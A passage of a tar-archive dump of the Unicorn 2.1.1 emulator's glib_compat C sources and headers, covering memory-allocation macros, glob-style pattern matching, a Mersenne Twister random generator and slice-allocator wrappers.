the GLib Team and others 1997-2000. See the AUTHORS * file for a list of people on the GLib Team. See the ChangeLog * files for a list of changes. These files are distributed with * GLib at ftp://ftp.gtk.org/pub/gtk/. */ #ifndef __G_MEM_H__ #define __G_MEM_H__ #include <limits.h> #include "gmacros.h" #define G_MAXSIZE ULONG_MAX /* Optimise: avoid the call to the (slower) _n function if we can * determine at compile-time that no overflow happens. */ #if defined (__GNUC__) && (__GNUC__ >= 2) && defined (__OPTIMIZE__) # define _G_NEW(struct_type, n_structs, func) \ (struct_type *) (G_GNUC_EXTENSION ({ \ gsize __n = (gsize) (n_structs); \ gsize __s = sizeof (struct_type); \ gpointer __p; \ if (__s == 1) \ __p = g_##func (__n); \ else if (__builtin_constant_p (__n) && \ (__s == 0 || __n <= G_MAXSIZE / __s)) \ __p = g_##func (__n * __s); \ else \ __p = g_##func##_n (__n, __s); \ __p; \ })) # define _G_RENEW(struct_type, mem, n_structs, func) \ (struct_type *) (G_GNUC_EXTENSION ({ \ gsize __n = (gsize) (n_structs); \ gsize __s = sizeof (struct_type); \ gpointer __p = (gpointer) (mem); \ if (__s == 1) \ __p = g_##func (__p, __n); \ else if (__builtin_constant_p (__n) && \ (__s == 0 || __n <= G_MAXSIZE / __s)) \ __p = g_##func (__p, __n * __s); \ else \ __p = g_##func##_n (__p, __n, __s); \ __p; \ })) #else /* Unoptimised version: always call the _n() function. */ #define _G_NEW(struct_type, n_structs, func) \ ((struct_type *) g_##func##_n ((n_structs), sizeof (struct_type))) #define _G_RENEW(struct_type, mem, n_structs, func) \ ((struct_type *) g_##func##_n (mem, (n_structs), sizeof (struct_type))) #endif gpointer g_try_malloc (gsize n_bytes); gpointer g_try_malloc0 (gsize n_bytes); gpointer g_try_malloc_n (gsize n_blocks, gsize n_block_bytes); gpointer g_malloc0_n (gsize n_blocks, gsize n_block_bytes); gpointer g_realloc_n (gpointer mem, gsize n_blocks, gsize n_block_bytes); gpointer g_malloc_n (gsize n_blocks, gsize n_block_bytes); gpointer g_malloc0 (gsize n_bytes); gpointer g_malloc (gsize n_bytes); void g_free (gpointer mem); /** * g_try_new: * @struct_type: the type of the elements to allocate * @n_structs: the number of elements to allocate * * Attempts to allocate @n_structs elements of type @struct_type, and returns * %NULL on failure. Contrast with g_new(), which aborts the program on failure. * The returned pointer is cast to a pointer to the given type. * The function returns %NULL when @n_structs is 0 of if an overflow occurs. * * Since: 2.8 * Returns: a pointer to the allocated memory, cast to a pointer to @struct_type */ #define g_try_new(struct_type, n_structs) _G_NEW (struct_type, n_structs, try_malloc) #define g_new0(struct_type, n_structs) _G_NEW (struct_type, n_structs, malloc0) #define g_new(struct_type, n_structs) _G_NEW (struct_type, n_structs, malloc) #define g_renew(struct_type, mem, n_structs) _G_RENEW (struct_type, mem, n_structs, realloc) #endif /* __G_MEM_H__ */ ������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/glib_compat/gmessages.h���������������������������������������������������������������0000664�0000000�0000000�00000002640�14675241067�0017615�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* GLIB - Library of useful routines for C programming * Copyright (C) 1995-1997 Peter Mattis, Spencer Kimball and Josh MacDonald * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ /* * Modified by the GLib Team and others 1997-2000. See the AUTHORS * file for a list of people on the GLib Team. See the ChangeLog * files for a list of changes. These files are distributed with * GLib at ftp://ftp.gtk.org/pub/gtk/. */ #ifndef __G_MESSAGES_H__ #define __G_MESSAGES_H__ #include "gmacros.h" #define g_return_val_if_fail(expr,val) G_STMT_START{ (void)0; }G_STMT_END #define g_return_if_fail(expr) G_STMT_START{ (void)0; }G_STMT_END #define g_return_if_reached() G_STMT_START{ return; }G_STMT_END #define g_return_val_if_reached(val) G_STMT_START{ return (val); }G_STMT_END #endif /* __G_MESSAGES_H__ */ ������������������������������������������������������������������������������������������������unicorn-2.1.1/glib_compat/gnode.h�������������������������������������������������������������������0000664�0000000�0000000�00000002360�14675241067�0016732�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* GLIB - Library of useful routines for C programming * Copyright (C) 1995-1997 Peter Mattis, Spencer Kimball and Josh MacDonald * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ /* * Modified by the GLib Team and others 1997-2000. See the AUTHORS * file for a list of people on the GLib Team. See the ChangeLog * files for a list of changes. These files are distributed with * GLib at ftp://ftp.gtk.org/pub/gtk/. */ #ifndef __G_NODE_H__ #define __G_NODE_H__ #include "gmem.h" /* Tree traverse orders */ typedef enum { G_IN_ORDER, G_PRE_ORDER, G_POST_ORDER, G_LEVEL_ORDER } GTraverseType; #endif /* __G_NODE_H__ */ ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/glib_compat/gpattern.c����������������������������������������������������������������0000664�0000000�0000000�00000030754�14675241067�0017465�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* GLIB - Library of useful routines for C programming * Copyright (C) 1995-1997, 1999 Peter Mattis, Red Hat, Inc. * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include <string.h> #include "gpattern.h" #include "gmacros.h" #include "gmessages.h" #include "gmem.h" /** * SECTION:patterns * @title: Glob-style pattern matching * @short_description: matches strings against patterns containing '*' * (wildcard) and '?' (joker) * * The g_pattern_match* functions match a string * against a pattern containing '*' and '?' wildcards with similar * semantics as the standard glob() function: '*' matches an arbitrary, * possibly empty, string, '?' matches an arbitrary character. * * Note that in contrast to glob(), the '/' character can be matched by * the wildcards, there are no '[...]' character ranges and '*' and '?' * can not be escaped to include them literally in a pattern. * * When multiple strings must be matched against the same pattern, it * is better to compile the pattern to a #GPatternSpec using * g_pattern_spec_new() and use g_pattern_match_string() instead of * g_pattern_match_simple(). This avoids the overhead of repeated * pattern compilation. **/ /** * GPatternSpec: * * A GPatternSpec struct is the 'compiled' form of a pattern. This * structure is opaque and its fields cannot be accessed directly. */ /* keep enum and structure of gpattern.c and patterntest.c in sync */ typedef enum { G_MATCH_ALL, /* "*A?A*" */ G_MATCH_ALL_TAIL, /* "*A?AA" */ G_MATCH_HEAD, /* "AAAA*" */ G_MATCH_TAIL, /* "*AAAA" */ G_MATCH_EXACT, /* "AAAAA" */ G_MATCH_LAST } GMatchType; struct _GPatternSpec { GMatchType match_type; guint pattern_length; guint min_length; guint max_length; gchar *pattern; }; /* --- functions --- */ static inline gboolean g_pattern_ph_match (const gchar *match_pattern, const gchar *match_string, gboolean *wildcard_reached_p) { const gchar *pattern, *string; gchar ch; pattern = match_pattern; string = match_string; ch = *pattern; pattern++; while (ch) { switch (ch) { case '?': if (!*string) return FALSE; string = string + 1; break; case '*': *wildcard_reached_p = TRUE; do { ch = *pattern; pattern++; if (ch == '?') { if (!*string) return FALSE; string = string + 1; } } while (ch == '*' || ch == '?'); if (!ch) return TRUE; do { gboolean next_wildcard_reached = FALSE; while (ch != *string) { if (!*string) return FALSE; string = string + 1; } string++; if (g_pattern_ph_match (pattern, string, &next_wildcard_reached)) return TRUE; if (next_wildcard_reached) /* the forthcoming pattern substring up to the next wildcard has * been matched, but a mismatch occurred for the rest of the * pattern, following the next wildcard. * there's no need to advance the current match position any * further if the rest pattern will not match. */ return FALSE; } while (*string); break; default: if (ch == *string) string++; else return FALSE; break; } ch = *pattern; pattern++; } return *string == 0; } static gchar *string_reverse(const gchar *string, gint string_length) { gchar *new_string; gint i, j; if (string == NULL || string_length <= 0) { return NULL; } new_string = g_new(gchar, string_length + 1); if (new_string) { for (i = 0; i < string_length; i++) { j = string_length - i - 1; new_string[j] = string[i]; } new_string[string_length] = 0; } return new_string; } /** * g_pattern_match: * @pspec: a #GPatternSpec * @string_length: the length of @string (in bytes, i.e. strlen(), * not g_utf8_strlen()) * @string: the UTF-8 encoded string to match * @string_reversed: (nullable): the reverse of @string or %NULL * * Matches a string against a compiled pattern. Passing the correct * length of the string given is mandatory. The reversed string can be * omitted by passing %NULL, this is more efficient if the reversed * version of the string to be matched is not at hand, as * g_pattern_match() will only construct it if the compiled pattern * requires reverse matches. * * Note that, if the user code will (possibly) match a string against a * multitude of patterns containing wildcards, chances are high that * some patterns will require a reversed string. In this case, it's * more efficient to provide the reversed string to avoid multiple * constructions thereof in the various calls to g_pattern_match(). * * Note also that the reverse of a UTF-8 encoded string can in general * not be obtained by g_strreverse(). This works only if the string * does not contain any multibyte characters. GLib offers the * g_utf8_strreverse() function to reverse UTF-8 encoded strings. * * Returns: %TRUE if @string matches @pspec **/ gboolean g_pattern_match (GPatternSpec *pspec, guint string_length, const gchar *string, const gchar *string_reversed) { g_return_val_if_fail (pspec != NULL, FALSE); g_return_val_if_fail (string != NULL, FALSE); if (string_length < pspec->min_length || string_length > pspec->max_length) return FALSE; switch (pspec->match_type) { gboolean dummy; case G_MATCH_ALL: return g_pattern_ph_match (pspec->pattern, string, &dummy); case G_MATCH_ALL_TAIL: if (string_reversed) return g_pattern_ph_match (pspec->pattern, string_reversed, &dummy); else { gboolean result; gchar *tmp; tmp = string_reverse (string, string_length); result = g_pattern_ph_match (pspec->pattern, tmp, &dummy); g_free (tmp); return result; } case G_MATCH_HEAD: if (pspec->pattern_length == string_length) return strcmp (pspec->pattern, string) == 0; else if (pspec->pattern_length) return strncmp (pspec->pattern, string, pspec->pattern_length) == 0; else return TRUE; case G_MATCH_TAIL: if (pspec->pattern_length) return strcmp (pspec->pattern, string + (string_length - pspec->pattern_length)) == 0; else return TRUE; case G_MATCH_EXACT: if (pspec->pattern_length != string_length) return FALSE; else return strcmp (pspec->pattern, string) == 0; default: g_return_val_if_fail (pspec->match_type < G_MATCH_LAST, FALSE); return FALSE; } } /** * g_pattern_spec_new: * @pattern: a zero-terminated UTF-8 encoded string * * Compiles a pattern to a #GPatternSpec. * * Returns: a newly-allocated #GPatternSpec **/ GPatternSpec* g_pattern_spec_new (const gchar *pattern) { GPatternSpec *pspec; gboolean seen_joker = FALSE, seen_wildcard = FALSE, more_wildcards = FALSE; gint hw_pos = -1, tw_pos = -1, hj_pos = -1, tj_pos = -1; gboolean follows_wildcard = FALSE; guint pending_jokers = 0; const gchar *s; gchar *d; guint i; g_return_val_if_fail (pattern != NULL, NULL); /* canonicalize pattern and collect necessary stats */ pspec = g_new (GPatternSpec, 1); pspec->pattern_length = strlen (pattern); pspec->min_length = 0; pspec->max_length = 0; pspec->pattern = g_new (gchar, pspec->pattern_length + 1); d = pspec->pattern; for (i = 0, s = pattern; *s != 0; s++) { switch (*s) { case '*': if (follows_wildcard) /* compress multiple wildcards */ { pspec->pattern_length--; continue; } follows_wildcard = TRUE; if (hw_pos < 0) hw_pos = i; tw_pos = i; break; case '?': pending_jokers++; pspec->min_length++; pspec->max_length += 4; /* maximum UTF-8 character length */ continue; default: for (; pending_jokers; pending_jokers--, i++) { *d++ = '?'; if (hj_pos < 0) hj_pos = i; tj_pos = i; } follows_wildcard = FALSE; pspec->min_length++; pspec->max_length++; break; } *d++ = *s; i++; } for (; pending_jokers; pending_jokers--) { *d++ = '?'; if (hj_pos < 0) hj_pos = i; tj_pos = i; } *d++ = 0; seen_joker = hj_pos >= 0; seen_wildcard = hw_pos >= 0; more_wildcards = seen_wildcard && hw_pos != tw_pos; if (seen_wildcard) pspec->max_length = UINT_MAX; /* special case sole head/tail wildcard or exact matches */ if (!seen_joker && !more_wildcards) { if (pspec->pattern[0] == '*') { pspec->match_type = G_MATCH_TAIL; memmove (pspec->pattern, pspec->pattern + 1, --pspec->pattern_length); pspec->pattern[pspec->pattern_length] = 0; return pspec; } if (pspec->pattern_length > 0 && pspec->pattern[pspec->pattern_length - 1] == '*') { pspec->match_type = G_MATCH_HEAD; pspec->pattern[--pspec->pattern_length] = 0; return pspec; } if (!seen_wildcard) { pspec->match_type = G_MATCH_EXACT; return pspec; } } /* now just need to distinguish between head or tail match start */ tw_pos = pspec->pattern_length - 1 - tw_pos; /* last pos to tail distance */ tj_pos = pspec->pattern_length - 1 - tj_pos; /* last pos to tail distance */ if (seen_wildcard) pspec->match_type = tw_pos > hw_pos ? G_MATCH_ALL_TAIL : G_MATCH_ALL; else /* seen_joker */ pspec->match_type = tj_pos > hj_pos ? G_MATCH_ALL_TAIL : G_MATCH_ALL; if (pspec->match_type == G_MATCH_ALL_TAIL) { gchar *tmp = pspec->pattern; pspec->pattern = string_reverse (pspec->pattern, pspec->pattern_length); g_free (tmp); } return pspec; } /** * g_pattern_spec_free: * @pspec: a #GPatternSpec * * Frees the memory allocated for the #GPatternSpec. **/ void g_pattern_spec_free (GPatternSpec *pspec) { g_return_if_fail (pspec != NULL); g_free (pspec->pattern); g_free (pspec); } /** * g_pattern_match_string: * @pspec: a #GPatternSpec * @string: the UTF-8 encoded string to match * * Matches a string against a compiled pattern. If the string is to be * matched against more than one pattern, consider using * g_pattern_match() instead while supplying the reversed string. * * Returns: %TRUE if @string matches @pspec **/ gboolean g_pattern_match_string (GPatternSpec *pspec, const gchar *string) { g_return_val_if_fail (pspec != NULL, FALSE); g_return_val_if_fail (string != NULL, FALSE); return g_pattern_match (pspec, strlen (string), string, NULL); } ��������������������unicorn-2.1.1/glib_compat/gpattern.h����������������������������������������������������������������0000664�0000000�0000000�00000002456�14675241067�0017470�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* GLIB - Library of useful routines for C programming * Copyright (C) 1995-1997, 1999 Peter Mattis, Red Hat, Inc. * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #ifndef __G_PATTERN_H__ #define __G_PATTERN_H__ #include "gtypes.h" typedef struct _GPatternSpec GPatternSpec; GPatternSpec* g_pattern_spec_new (const gchar *pattern); void g_pattern_spec_free (GPatternSpec *pspec); gboolean g_pattern_match (GPatternSpec *pspec, guint string_length, const gchar *string, const gchar *string_reversed); gboolean g_pattern_match_string (GPatternSpec *pspec, const gchar *string); #endif /* __G_PATTERN_H__ */ ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/glib_compat/grand.c�������������������������������������������������������������������0000664�0000000�0000000�00000024631�14675241067�0016731�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* GLIB - Library of useful routines for C programming * Copyright (C) 1995-1997 Peter Mattis, Spencer Kimball and Josh MacDonald * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ /* Originally developed and coded by Makoto Matsumoto and Takuji * Nishimura. Please mail <matumoto@math.keio.ac.jp>, if you're using * code from this file in your own programs or libraries. * Further information on the Mersenne Twister can be found at * http://www.math.sci.hiroshima-u.ac.jp/~m-mat/MT/emt.html * This code was adapted to glib by Sebastian Wilhelmi. */ /* * Modified by the GLib Team and others 1997-2000. See the AUTHORS * file for a list of people on the GLib Team. See the ChangeLog * files for a list of changes. These files are distributed with * GLib at ftp://ftp.gtk.org/pub/gtk/. */ /* * MT safe */ #define _CRT_RAND_S #include <math.h> #include <errno.h> #include <stdio.h> #include <string.h> #include <sys/types.h> #ifndef _MSC_VER #include <unistd.h> #include <sys/time.h> #else #include <windows.h> #endif #include "grand.h" #include "gmem.h" #include "gmessages.h" #define G_USEC_PER_SEC 1000000 #if defined(__MINGW64_VERSION_MAJOR) || defined(_WIN32) errno_t rand_s(unsigned int* randomValue); #endif #define G_GINT64_CONSTANT(val) (val##L) /* Period parameters */ #define N 624 #define M 397 #define MATRIX_A 0x9908b0df /* constant vector a */ #define UPPER_MASK 0x80000000 /* most significant w-r bits */ #define LOWER_MASK 0x7fffffff /* least significant r bits */ /* Tempering parameters */ #define TEMPERING_MASK_B 0x9d2c5680 #define TEMPERING_MASK_C 0xefc60000 #define TEMPERING_SHIFT_U(y) (y >> 11) #define TEMPERING_SHIFT_S(y) (y << 7) #define TEMPERING_SHIFT_T(y) (y << 15) #define TEMPERING_SHIFT_L(y) (y >> 18) struct _GRand { guint32 mt[N]; /* the array for the state vector */ guint mti; }; static guint get_random_version (void) { static gsize initialized = FALSE; static guint random_version; if (!initialized) { // g_warning ("Unknown G_RANDOM_VERSION \"%s\". Using version 2.2.", version_string); random_version = 22; initialized = TRUE; } return random_version; } /** * g_rand_set_seed: * @rand_: a #GRand * @seed: a value to reinitialize the random number generator * * Sets the seed for the random number generator #GRand to @seed. */ void g_rand_set_seed (GRand *rand, guint32 seed) { g_return_if_fail (rand != NULL); switch (get_random_version ()) { case 20: /* setting initial seeds to mt[N] using */ /* the generator Line 25 of Table 1 in */ /* [KNUTH 1981, The Art of Computer Programming */ /* Vol. 2 (2nd Ed.), pp102] */ if (seed == 0) /* This would make the PRNG produce only zeros */ seed = 0x6b842128; /* Just set it to another number */ rand->mt[0]= seed; for (rand->mti=1; rand->mti<N; rand->mti++) rand->mt[rand->mti] = (69069 * rand->mt[rand->mti-1]); break; case 22: /* See Knuth TAOCP Vol2. 3rd Ed. P.106 for multiplier. */ /* In the previous version (see above), MSBs of the */ /* seed affect only MSBs of the array mt[]. */ rand->mt[0]= seed; for (rand->mti=1; rand->mti<N; rand->mti++) rand->mt[rand->mti] = 1812433253UL * (rand->mt[rand->mti-1] ^ (rand->mt[rand->mti-1] >> 30)) + rand->mti; break; default: // g_assert_not_reached (); break; } } /** * g_rand_new_with_seed: * @seed: a value to initialize the random number generator * * Creates a new random number generator initialized with @seed. * * Returns: the new #GRand **/ GRand* g_rand_new_with_seed (guint32 seed) { GRand *rand = g_new0 (GRand, 1); g_rand_set_seed (rand, seed); return rand; } /** * g_rand_set_seed_array: * @rand_: a #GRand * @seed: array to initialize with * @seed_length: length of array * * Initializes the random number generator by an array of longs. * Array can be of arbitrary size, though only the first 624 values * are taken. This function is useful if you have many low entropy * seeds, or if you require more then 32 bits of actual entropy for * your application. * * Since: 2.4 */ void g_rand_set_seed_array (GRand *rand, const guint32 *seed, guint seed_length) { guint i, j, k; g_return_if_fail (rand != NULL); g_return_if_fail (seed_length >= 1); g_rand_set_seed (rand, 19650218UL); i=1; j=0; k = (N>seed_length ? N : seed_length); for (; k; k--) { rand->mt[i] = (rand->mt[i] ^ ((rand->mt[i-1] ^ (rand->mt[i-1] >> 30)) * 1664525UL)) + seed[j] + j; /* non linear */ rand->mt[i] &= 0xffffffffUL; /* for WORDSIZE > 32 machines */ i++; j++; if (i>=N) { rand->mt[0] = rand->mt[N-1]; i=1; } if (j>=seed_length) j=0; } for (k=N-1; k; k--) { rand->mt[i] = (rand->mt[i] ^ ((rand->mt[i-1] ^ (rand->mt[i-1] >> 30)) * 1566083941UL)) - i; /* non linear */ rand->mt[i] &= 0xffffffffUL; /* for WORDSIZE > 32 machines */ i++; if (i>=N) { rand->mt[0] = rand->mt[N-1]; i=1; } } rand->mt[0] = 0x80000000UL; /* MSB is 1; assuring non-zero initial array */ } /** * g_rand_new_with_seed_array: * @seed: an array of seeds to initialize the random number generator * @seed_length: an array of seeds to initialize the random number * generator * * Creates a new random number generator initialized with @seed. * * Returns: the new #GRand * * Since: 2.4 */ GRand *g_rand_new_with_seed_array (const guint32 *seed, guint seed_length) { GRand *rand = g_new0 (GRand, 1); g_rand_set_seed_array (rand, seed, seed_length); return rand; } gint64 g_get_real_time (void) { #if defined(unix) || defined(__unix__) || defined(__unix) || defined (__MINGW32__) || defined(__APPLE__) || defined(__HAIKU__) struct timeval r; /* this is required on alpha, there the timeval structs are ints * not longs and a cast only would fail horribly */ gettimeofday (&r, NULL); return (((gint64) r.tv_sec) * 1000000) + r.tv_usec; #else FILETIME ft; guint64 time64; GetSystemTimeAsFileTime (&ft); memmove (&time64, &ft, sizeof (FILETIME)); /* Convert from 100s of nanoseconds since 1601-01-01 * to Unix epoch. This is Y2038 safe. */ time64 -= G_GINT64_CONSTANT (116444736000000000); time64 /= 10; return time64; #endif } /** * g_rand_new: * * Creates a new random number generator initialized with a seed taken * either from `/dev/urandom` (if existing) or from the current time * (as a fallback). * * On Windows, the seed is taken from rand_s(). * * Returns: the new #GRand */ GRand *g_rand_new (void) { guint32 seed[4]; #if defined(unix) || defined(__unix__) || defined(__unix) || defined(__APPLE__) || defined(__HAIKU__) static gboolean dev_urandom_exists = TRUE; if (dev_urandom_exists) { FILE* dev_urandom; do { dev_urandom = fopen("/dev/urandom", "rb"); } while (dev_urandom == NULL && errno == EINTR); if (dev_urandom) { int r; setvbuf (dev_urandom, NULL, _IONBF, 0); do { errno = 0; r = fread (seed, sizeof (seed), 1, dev_urandom); } while (errno == EINTR); if (r != 1) dev_urandom_exists = FALSE; fclose (dev_urandom); } else dev_urandom_exists = FALSE; } if (!dev_urandom_exists) { gint64 now_us = g_get_real_time (); seed[0] = now_us / G_USEC_PER_SEC; seed[1] = now_us % G_USEC_PER_SEC; seed[2] = getpid (); seed[3] = getppid (); } #else /* G_OS_WIN32 */ /* rand_s() is only available since Visual Studio 2005 and * MinGW-w64 has a wrapper that will emulate rand_s() if it's not in msvcrt */ #if (defined(_MSC_VER) && _MSC_VER >= 1400) || defined(__MINGW64_VERSION_MAJOR) gint i; for (i = 0; i < 4;/* array size of seed */ i++) { rand_s(&seed[i]); } #else #warning Using insecure seed for random number generation because of missing rand_s() in Windows XP GTimeVal now; g_get_current_time (&now); seed[0] = now.tv_sec; seed[1] = now.tv_usec; seed[2] = getpid (); seed[3] = 0; #endif #endif return g_rand_new_with_seed_array (seed, 4); } /** * g_rand_int: * @rand_: a #GRand * * Returns the next random #guint32 from @rand_ equally distributed over * the range [0..2^32-1]. * * Returns: a random number */ guint32 g_rand_int (GRand *rand) { guint32 y; static const guint32 mag01[2]={0x0, MATRIX_A}; /* mag01[x] = x * MATRIX_A for x=0,1 */ g_return_val_if_fail (rand != NULL, 0); if (rand->mti >= N) { /* generate N words at one time */ int kk; for (kk = 0; kk < N - M; kk++) { y = (rand->mt[kk]&UPPER_MASK)|(rand->mt[kk+1]&LOWER_MASK); rand->mt[kk] = rand->mt[kk+M] ^ (y >> 1) ^ mag01[y & 0x1]; } for (; kk < N - 1; kk++) { y = (rand->mt[kk]&UPPER_MASK)|(rand->mt[kk+1]&LOWER_MASK); rand->mt[kk] = rand->mt[kk+(M-N)] ^ (y >> 1) ^ mag01[y & 0x1]; } y = (rand->mt[N-1]&UPPER_MASK)|(rand->mt[0]&LOWER_MASK); rand->mt[N-1] = rand->mt[M-1] ^ (y >> 1) ^ mag01[y & 0x1]; rand->mti = 0; } y = rand->mt[rand->mti++]; y ^= TEMPERING_SHIFT_U(y); y ^= TEMPERING_SHIFT_S(y) & TEMPERING_MASK_B; y ^= TEMPERING_SHIFT_T(y) & TEMPERING_MASK_C; y ^= TEMPERING_SHIFT_L(y); return y; } �������������������������������������������������������������������������������������������������������unicorn-2.1.1/glib_compat/grand.h�������������������������������������������������������������������0000664�0000000�0000000�00000002513�14675241067�0016731�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* GLIB - Library of useful routines for C programming * Copyright (C) 1995-1997 Peter Mattis, Spencer Kimball and Josh MacDonald * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ /* * Modified by the GLib Team and others 1997-2000. See the AUTHORS * file for a list of people on the GLib Team. See the ChangeLog * files for a list of changes. These files are distributed with * GLib at ftp://ftp.gtk.org/pub/gtk/. */ #ifndef __G_RAND_H__ #define __G_RAND_H__ #include "gtypes.h" typedef struct _GRand GRand; GRand *g_rand_new_with_seed(guint32 seed); GRand *g_rand_new_with_seed_array (const guint32 *seed, guint seed_length); GRand *g_rand_new(void); guint32 g_rand_int(GRand *rand_); #endif /* __G_RAND_H__ */ �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/glib_compat/gslice.c������������������������������������������������������������������0000664�0000000�0000000�00000005514�14675241067�0017103�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* GLIB sliced memory - fast concurrent memory chunk allocator * Copyright (C) 2005 Tim Janik * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ /* MT safe */ #include <string.h> #include "gtypes.h" #include "gslice.h" #include "gmem.h" /* gslice.h */ /** * g_slice_alloc: * @block_size: the number of bytes to allocate * * Allocates a block of memory from the slice allocator. * The block address handed out can be expected to be aligned * to at least 1 * sizeof (void*), * though in general slices are 2 * sizeof (void*) bytes aligned, * if a malloc() fallback implementation is used instead, * the alignment may be reduced in a libc dependent fashion. * Note that the underlying slice allocation mechanism can * be changed with the [`G_SLICE=always-malloc`][G_SLICE] * environment variable. * * Returns: a pointer to the allocated memory block, which will be %NULL if and * only if @mem_size is 0 * * Since: 2.10 */ gpointer g_slice_alloc (gsize mem_size) { return g_malloc (mem_size); } /** * g_slice_alloc0: * @block_size: the number of bytes to allocate * * Allocates a block of memory via g_slice_alloc() and initializes * the returned memory to 0. Note that the underlying slice allocation * mechanism can be changed with the [`G_SLICE=always-malloc`][G_SLICE] * environment variable. * * Returns: a pointer to the allocated block, which will be %NULL if and only * if @mem_size is 0 * * Since: 2.10 */ gpointer g_slice_alloc0 (gsize mem_size) { gpointer mem = g_slice_alloc (mem_size); if (mem) memset (mem, 0, mem_size); return mem; } /** * g_slice_free1: * @block_size: the size of the block * @mem_block: a pointer to the block to free * * Frees a block of memory. * * The memory must have been allocated via g_slice_alloc() or * g_slice_alloc0() and the @block_size has to match the size * specified upon allocation. Note that the exact release behaviour * can be changed with the [`G_DEBUG=gc-friendly`][G_DEBUG] environment * variable, also see [`G_SLICE`][G_SLICE] for related debugging options. * * If @mem_block is %NULL, this function does nothing. * * Since: 2.10 */ void g_slice_free1 (gsize mem_size, gpointer mem_block) { g_free (mem_block); } ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/glib_compat/gslice.h������������������������������������������������������������������0000664�0000000�0000000�00000002607�14675241067�0017110�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* GLIB sliced memory - fast threaded memory chunk allocator * Copyright (C) 2005 Tim Janik * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #ifndef __G_SLICE_H__ #define __G_SLICE_H__ #include "gtypes.h" #define g_slice_new(type) ((type*) g_slice_alloc (sizeof (type))) #define g_slice_new0(type) ((type*) g_slice_alloc0 (sizeof (type))) gpointer 